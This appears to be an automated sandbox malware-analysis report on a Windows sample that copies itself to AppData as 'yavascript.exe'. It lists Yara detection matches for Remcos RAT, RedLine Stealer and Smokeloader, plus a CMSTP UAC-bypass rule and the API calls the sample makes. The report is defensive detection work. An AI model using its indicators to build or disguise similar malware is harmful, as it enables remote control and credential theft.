Source: Yara match	File source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754239939.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2iH7rqx9rQ.exe PID: 2268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 2980, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0041BB77 SystemParametersInfoW,	0_2_0041BB77
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0248BDDE SystemParametersInfoW,	0_2_0248BDDE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0041BB77 SystemParametersInfoW,	23_2_0041BB77
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AFBDDE SystemParametersInfoW,	23_2_00AFBDDE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0041BB77 SystemParametersInfoW,	24_2_0041BB77
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0252BDDE SystemParametersInfoW,	24_2_0252BDDE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0041BB77 SystemParametersInfoW,	35_2_0041BB77
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024FBDDE SystemParametersInfoW,	35_2_024FBDDE

System Summary

Malicious sample detected (through community Yara rule)

Source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000018.00000002.1779032032.0000000000A21000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1754203056.000000000089C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.2515260424.0000000000B7B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000023.00000002.1789635981.00000000009B1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: Process Memory Space: 2iH7rqx9rQ.exe PID: 2268, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: yavascript.exe PID: 7796, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: yavascript.exe PID: 7828, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: yavascript.exe PID: 2980, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	0_2_0041CA9E
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,	0_2_0041ACC1
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,	0_2_0041ACED
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0248AF54 OpenProcess,NtResumeProcess,CloseHandle,	0_2_0248AF54
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0248AF28 OpenProcess,NtSuspendProcess,CloseHandle,	0_2_0248AF28
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0248CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	0_2_0248CD05
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	23_2_0041CA9E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,	23_2_0041ACC1
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,	23_2_0041ACED
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AFCD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	23_2_00AFCD05
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AFAF28 OpenProcess,NtSuspendProcess,CloseHandle,	23_2_00AFAF28
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AFAF54 OpenProcess,NtResumeProcess,CloseHandle,	23_2_00AFAF54
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	24_2_0041CA9E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,	24_2_0041ACC1
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,	24_2_0041ACED
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0252AF54 OpenProcess,NtResumeProcess,CloseHandle,	24_2_0252AF54
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0252AF28 OpenProcess,NtSuspendProcess,CloseHandle,	24_2_0252AF28
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0252CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	24_2_0252CD05
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	35_2_0041CA9E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,	35_2_0041ACC1
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,	35_2_0041ACED
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024FAF54 OpenProcess,NtResumeProcess,CloseHandle,	35_2_024FAF54
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024FAF28 OpenProcess,NtSuspendProcess,CloseHandle,	35_2_024FAF28
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024FCD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	35_2_024FCD05

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,	0_2_004158B9
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02485B1C ExitWindowsEx,LoadLibraryA,GetProcAddress,	0_2_02485B1C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,	23_2_004158B9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AF5B1C ExitWindowsEx,LoadLibraryA,GetProcAddress,	23_2_00AF5B1C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,	24_2_004158B9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02525B1C ExitWindowsEx,LoadLibraryA,GetProcAddress,	24_2_02525B1C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,	35_2_004158B9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024F5B1C ExitWindowsEx,LoadLibraryA,GetProcAddress,	35_2_024F5B1C

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0041D071	0_2_0041D071
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_004520D2	0_2_004520D2
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0043D098	0_2_0043D098
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00437150	0_2_00437150
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_004361AA	0_2_004361AA
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00426254	0_2_00426254
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00431377	0_2_00431377
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0043651C	0_2_0043651C
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0041E5DF	0_2_0041E5DF
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0044C739	0_2_0044C739
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_004367C6	0_2_004367C6
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_004267CB	0_2_004267CB
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0043C9DD	0_2_0043C9DD
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00432A49	0_2_00432A49
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00436A8D	0_2_00436A8D
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0043CC0C	0_2_0043CC0C
